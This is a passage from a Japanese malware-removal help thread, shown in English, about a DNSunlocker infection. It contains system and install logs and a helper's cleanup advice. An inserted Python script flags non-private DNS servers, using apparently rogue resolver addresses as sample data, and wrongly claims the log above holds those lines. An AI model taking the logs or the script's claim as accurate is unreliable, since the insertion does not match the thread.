O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 12064 bytes


cc windows---------------------------

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run Dropbox Update Dropbox, Inc. "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
無効 HKLM:Run Adobe ARM Adobe Systems Incorporated "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
有効 HKLM:Run BackupManagerTray NTI Corporation "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
有効 HKLM:Run ETDCtrl ELAN Microelectronics Corp. %ProgramFiles%\Elantech\ETDCtrl.exe
有効 HKLM:Run Google Japanese Input Prelauncher Google Inc. "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
有効 HKLM:Run HotKeysCmds Intel Corporation C:\Windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\Windows\system32\igfxtray.exe
有効 HKLM:Run IntelTBRunOnce Microsoft Corporation wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
有効 HKLM:Run iTunesHelper Apple Inc. "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
有効 HKLM:Run Launch LCore Logitech Inc. C:\Program Files\Logicool Gaming Software\LCore.exe /minimized
有効 HKLM:Run LManager Dritek System Inc. C:\Program Files (x86)\Launch Manager\LManager.exe
有効 HKLM:Run Logitech Download Assistant Microsoft Corporation C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
無効 HKLM:Run LogMeIn Hamachi Ui LogMeIn Inc. "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
無効 HKLM:Run mcui_exe "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
有効 HKLM:Run MSC Microsoft Corporation "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
無効 HKLM:Run Norton Online Backup Symantec Corporation C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
有効 HKLM:Run Persistence Intel Corporation C:\Windows\system32\igfxpers.exe
無効 HKLM:Run RTHDVCPL Realtek Semiconductor C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
有効 HKLM:Run SuiteTray Egis Technology Inc. "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
有効 HKLM:Run SunJavaUpdateSched Oracle Corporation "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
有効 Startup User Dropbox.lnk Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe


cc ie---------------------------

有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Helper DOwnnSave C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll
有効 Helper Java(tm) Plug-In 2 SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
有効 Helper Java(tm) Plug-In SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
無効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
無効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll


cc fire fox----------------------

有効 Plugin Adobe Acrobat 10.1.15.11 Adobe Systems Inc. default Firefox 40.0.3 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
有効 Plugin Battlelog Game Launcher 2.4.0.0 EA Digital Illusions CE AB default Firefox 40.0.3 C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
有効 Plugin Battlelog Game Launcher 2.6.2.0 EA Digital Illusions CE AB default Firefox 40.0.3 C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll
有効 Plugin Google Update 1.3.28.13 default Firefox 40.0.3 C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 40.0.3 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 40.0.3 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
有効 Plugin iTunes Application Detector 1.0.1.1 Apple Inc. default Firefox 40.0.3 C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin Java Deployment Toolkit 8.0.600.27 11.60.2.27 Oracle Corporation default Firefox 40.0.3 C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 8 U60 11.60.2.27 Oracle Corporation default Firefox 40.0.3 C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll
有効 Plugin Nexon Game Controller 1.0.1.4 Nexon default Firefox 40.0.3 C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin Shockwave Flash 18.0.0.232 Adobe Systems Incorporated default Firefox 40.0.3 C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
有効 Plugin Silverlight Plug-In 5.1.40416.0 Microsoft Corporation default Firefox 40.0.3 c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll
有効 Plugin Unity Player 4.3.7.33236 Unity Technologies ApS default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3538.513 Microsoft Corporation default Firefox 40.0.3 C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll


cc chrome---------------------------

有効 App Gmail 8.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 14.0 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0
有効 App YouTube 4.2.7 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0
有効 Extension Adblock Plus 1.9.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.1_0
有効 Extension FireShot - ウェブページのスクリーンショットをキャプチャ 0.98.80 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0
有効 Extension Gestures for Google Chrome™ 1.13.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0
有効 Extension グランブルーファンタジー[ChromeApps版] 1.2.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.1_0


cc scheduled tasks--------------------------

有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /c
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"
有効 Task {D0CA0B4E-A50D-488A-974E-DEB3A0548969} Google Inc. "c:\program files (x86)\google\chrome\application\chrome.exe" http://ui.skype.com/ui/0/6.20.0.104/ja/abandoninstall?page=tsProgressBar


cc context menu ----------------

有効 Directory 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 Directory DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 Directory ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 Directory ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Directory VLCメディアプレイヤーで再生 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1"
有効 Directory VLCメディアプレイヤーのプレイリストに追加 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1"
有効 Directory 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 Drive ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Drive 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 File 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 File DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 File MWLIVShellExt Egis Technology Inc. C:\Program Files (x86)\EgisTec MyWinLocker\x64\MWLIVShellExt.dll
有効 File ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 File ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 File ShredderContextMenu Egis Technology Inc. C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll
有効 Folder ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
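The O17 lines in the HijackThis log above record the statically configured DNS servers of each network adapter. As an added example (not part of the original thread and not a HijackThis feature), this Python script parses O17 `NameServer` lines and lists the adapters whose servers lie outside private address ranges, so they can be compared with the router or ISP settings. The sample lines are copied from the log above; the function and class names are hypothetical.

```python
import ipaddress
import re
from dataclasses import dataclass

# Lines copied from the HijackThis log in the post above.
SAMPLE_LOG = r"""
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
"""

# "O17 - HKLM\System\<control set>\Services\Tcpip\<where>: <value name> = <data>"
O17_RE = re.compile(
    r"^O17 - HKLM\\System\\(?P<cs>[^\\]+)\\Services\\Tcpip\\"
    r"(?P<where>[^:]+): (?P<name>\w+) = (?P<value>.*)$"
)
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")

# Ranges treated as "local" (a home router or the machine itself).
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                  # loopback, link-local
    "::1/128", "fc00::/7", "fe80::/10",               # IPv6 counterparts
)]


@dataclass(frozen=True)
class DnsEntry:
    control_set: str   # CCS, CS1, CS2 as abbreviated in the log
    adapter: str       # interface GUID, or the raw key tail if none
    servers: tuple     # server strings exactly as logged


def is_local(addr):
    """True if addr is inside one of LOCAL_NETS; ValueError if not an IP."""
    ip = ipaddress.ip_address(addr)
    return any(ip.version == net.version and ip in net for net in LOCAL_NETS)


def parse_o17(log_text):
    """Return one DnsEntry per O17 NameServer line in a HijackThis log."""
    entries = []
    for line in log_text.splitlines():
        m = O17_RE.match(line.strip())
        if not m or m.group("name") != "NameServer":
            continue
        guid = GUID_RE.search(m.group("where"))
        adapter = guid.group(0).upper() if guid else m.group("where")
        # The registry value may separate servers with commas or spaces.
        servers = tuple(s for s in re.split(r"[,\s]+", m.group("value").strip()) if s)
        entries.append(DnsEntry(m.group("cs"), adapter, servers))
    return entries


def review_list(log_text):
    """Adapters with a static DNS server that is not local (or not an IP).

    Returns {adapter: {"servers": [...], "control_sets": [...]}}.
    """
    findings = {}
    for entry in parse_o17(log_text):
        flagged = []
        for server in entry.servers:
            try:
                if not is_local(server):
                    flagged.append(server)
            except ValueError:
                flagged.append(server)  # unparseable data also needs a look
        if flagged:
            slot = findings.setdefault(
                entry.adapter, {"servers": set(), "control_sets": set()})
            slot["servers"].update(flagged)
            slot["control_sets"].add(entry.control_set)
    return {adapter: {"servers": sorted(slot["servers"]),
                      "control_sets": sorted(slot["control_sets"])}
            for adapter, slot in findings.items()}


if __name__ == "__main__":
    for adapter, info in review_list(SAMPLE_LOG).items():
        print(adapter, ", ".join(info["servers"]),
              "in", "/".join(info["control_sets"]))
```

An adapter listed here is only a candidate for review: a deliberately configured public resolver produces the same output.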
  • あすとろ
  • 2015/09/16 (Wed) 23:12:01
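Please post the install information log too
Good morning.
I have looked at each of the current logs, but one more, the install information log, has not been posted, so please show me that log as well.

There is no need to rush; do the work and reply at your own pace when you have time.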
  • 悪代官
  • 2015/09/17 (Thu) 07:06:57
Re: DNSunlocker infection
Hello

Sorry once again… I'll paste the install log too.


7-Zip 9.20 (x64 edition) Igor Pavlov 2014/04/02 4.53 MB 9.20.00.0
Acer Backup Manager NTI Corporation 2012/06/20 3.0.0.100
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 1.04.3507
Acer ScreenSaver Acer Incorporated 20.11.1107.1418
Adobe AIR Adobe Systems Incorporated 2014/04/23 13.0.0.83
Adobe Flash Player 18 ActiveX Adobe Systems Incorporated 18.0.0.232
Adobe Flash Player 18 NPAPI Adobe Systems Incorporated 18.0.0.232
Adobe Reader X (10.1.15) MUI Adobe Systems Incorporated 2015/09/07 548 MB 10.1.15
Apple Application Support(32 ビット) Apple Inc. 2015/04/18 94.2 MB 3.1.3
Apple Application Support(64 ビット) Apple Inc. 2015/04/18 107 MB 3.1.3
Apple Mobile Device Support Apple Inc. 2015/08/24 23.1 MB 8.1.1.3
Apple Software Update Apple Inc. 2014/04/07 2.38 MB 2.1.3.127
Battlelog Web Plugins EA Digital Illusions CE AB 2.6.2
Bonjour Apple Inc. 2014/06/04 2.00 MB 3.0.0.10
Borderlands 2 Gearbox Software
Broadcom Card Reader Driver Installer Broadcom Corporation 2013/08/08 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 5.100.82.120
CCleaner Piriform 5.09
Chrome Remote Desktop Host Google Inc. 2015/09/03 18.0 MB 45.0.2454.17
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 6.5.2727_43992
DisplayLink Core Software DisplayLink Corp. 2015/06/22 26.8 MB 7.8.63104.0
DisplayLink Graphics DisplayLink Corp. 2015/06/22 4.48 MB 7.8.63153.0
Dropbox Dropbox, Inc. 3.8.8
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 10.6.9.9
Explzh for Windows (64bit) pon software 7.2.3.0
Fallout 3 - Game of the Year Edition Bethesda Game Studios
Google Chrome Google Inc. 2015/09/09 45.0.2454.93
Google 日本語入力 Google Inc. 2015/09/12 86.9 MB 2.17.2300.0
Hangame
Identity Card Acer Incorporated 1.00.3501
Intel(R) Control Center Intel Corporation 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation
Intel(R) Processor Graphics Intel Corporation 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2013/08/08 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/08/24 242 MB 12.1.2.27
Jane Style Version 3.83 Jane, Inc. 2015/04/06 3.83
Janetter 4.3.0.2 Jane, Inc. 2014/11/26
Java 8 Update 60 Oracle Corporation 2015/09/07 20.6 MB 8.0.600.27
Launch Manager Acer Inc. 5.1.15
League of Legends Riot Games 2015/05/18 3.0.1
Left 4 Dead 2 Valve
LEGO® Worlds TT Games
Logicool ゲーム ソフトウェア 8.57 Logicool 8.57.145
LogMeIn Hamachi LogMeIn, Inc. 2015/08/03 2.2.0.383
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/05/18 4.5.51209
Microsoft Games for Windows - LIVE Redistributable Microsoft Corporation 2015/06/22 32.5 MB 2.0.672.0
Microsoft OneDrive Microsoft Corporation 17.3.5930.0814
Microsoft Security Essentials Microsoft Corporation 2015/05/18 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/05/18 150 MB 5.1.40416.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2013/08/08 2.62 MB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2014/04/07 572 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2013/08/08 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2014/04/08 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2015/03/06 1.41 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2013/08/08 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2014/04/08 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 15.2 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 12.2 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 Microsoft Corporation 11.0.61030.0
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 Microsoft Corporation 11.0.61030.0
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/08/05 8.03 MB 4.0.20823.0
Mozilla Firefox 40.0.3 (x86 ja) Mozilla 40.0.3
Mozilla Maintenance Service Mozilla 40.0.3
MyWinLocker Suite Egis Technology Inc. 2012/06/20 4.0.14.19
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2013/08/08 9.0.2.9006
Origin Electronic Arts, Inc. 9.4.7.2799
Portal 2 Valve
PunkBuster Services Even Balance, Inc. 0.994
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2013/08/08 6.0.1.6543
RED BELT SKIN Series 2014/10/18
Skype Click to Call Microsoft Corporation 2015/09/07 7.16 MB 7.4.0.9058
Skype(TM) 7.8 Skype Technologies S.A. 2015/09/07 71.1 MB 7.8.102
Starbound
Starbound - Unstable
Steam Valve Corporation
TeamSpeak 3 Client TeamSpeak Systems GmbH 3.0.16
Terraria Re-Logic
The Walking Dead
The Walking Dead: Season Two Telltale Games
Unity Web Player Unity Technologies ApS
Vivaldi Vivaldi 2015/06/30 1.0.162.9
VLC media player VideoLAN 2.2.1
Welcome Center Acer Incorporated 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
World of Warships Wargaming.net 2015/05/01
XMedia Recode バージョン 3.1.9.0 XMedia Recode 2014/06/21 3.1.9.0
らくらく無線スタートEX NEC AccessTechnica, Ltd.
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2013/08/08 13.2 MB 2.5.1.0
  • あすとろ
  • 2015/09/17 (Thu) 15:16:38
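A few updates as well
Thank you for the work and the report.
I have also looked at the information logs.
The Adobe Reader update failure, which has been occurring abnormally often lately, is still there, but it seems all we can do now is wait for a fix on Adobe's side.
So I recommend handling PDFs with a different app.

First, uninstall Adobe Reader using GU.
Do not uninstall it the normal way; force-remove it with "Remove Entry" (エントリの削除).

After that, install the PDF app below.
http://www.forest.impress.co.jp/library/software/pdfxchange/

This is a PDF app with fewer vulnerabilities than Adobe Reader, and its usability is also highly rated.

Also, the following is currently not the latest version, so there are two choices: update it or remove it.
>Skype(TM) 7.8 Skype Technologies S.A. 2015/09/07 71.1 MB 7.8.102

Once this is done, restart the PC once more, retake only the installed-programs log, and show it to me.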
  • 悪代官
  • 2015/09/17 (Thu) 17:46:30
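Re: DNSunlocker infection
>Also, the following is currently not the latest version, so there are two choices: update it or remove it.
I would like to update Skype.

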